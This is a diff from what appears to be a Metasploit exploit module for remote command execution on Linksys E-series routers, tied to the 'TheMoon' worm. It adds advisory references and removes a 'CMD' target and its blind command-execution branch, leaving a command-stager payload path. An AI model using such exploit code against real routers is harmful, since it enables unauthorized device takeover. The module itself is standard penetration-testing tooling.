@@ -36,9 +36,12 @@ module was tested against a E1500 v1.0.5.
36
36
'References' =>
37
37
[
38
38
[ 'EDB' , '31683' ] ,
39
+ [ 'BID' , '65585' ] ,
40
+ [ 'OSVDB' , '103321' ] ,
39
41
[ 'URL' , 'http://packetstormsecurity.com/files/125253/linksyseseries-exec.txt' ] ,
40
42
[ 'URL' , 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ] ,
41
- [ 'URL' , 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ]
43
+ [ 'URL' , 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ] ,
44
+ [ 'URL' , 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
42
45
] ,
43
46
'DisclosureDate' => 'Feb 13 2014' ,
44
47
'Privileged' => true ,
@@ -49,12 +52,6 @@ module was tested against a E1500 v1.0.5.
49
52
} ,
50
53
'Targets' =>
51
54
[
52
- [ 'CMD' ,
53
- {
54
- 'Arch' => ARCH_CMD ,
55
- 'Platform' => 'unix'
56
- }
57
- ] ,
58
55
[ 'Linux mipsel Payload' ,
59
56
{
60
57
'Arch' => ARCH_MIPSLE ,
@@ -116,20 +113,6 @@ def exploit
116
113
fail_with ( Failure ::Unreachable , "#{ peer } - Failed to connect to the web server" )
117
114
end
118
115
119
- if target . name =~ /CMD/
120
- if not ( datastore [ 'CMD' ] )
121
- fail_with ( Failure ::BadConfig , "#{ peer } - Only the cmd/generic payload is compatible" )
122
- end
123
- cmd = payload . encoded
124
- res = execute_command ( cmd , "0" )
125
- if ( !res )
126
- fail_with ( Failure ::Unknown , "#{ peer } - Unable to execute payload" )
127
- else
128
- print_status ( "#{ peer } - Blind Exploitation - unknown Exploitation state" )
129
- end
130
- return
131
- end
132
-
133
116
execute_cmdstager (
134
117
:linemax => 26
135
118
)
0 commit comments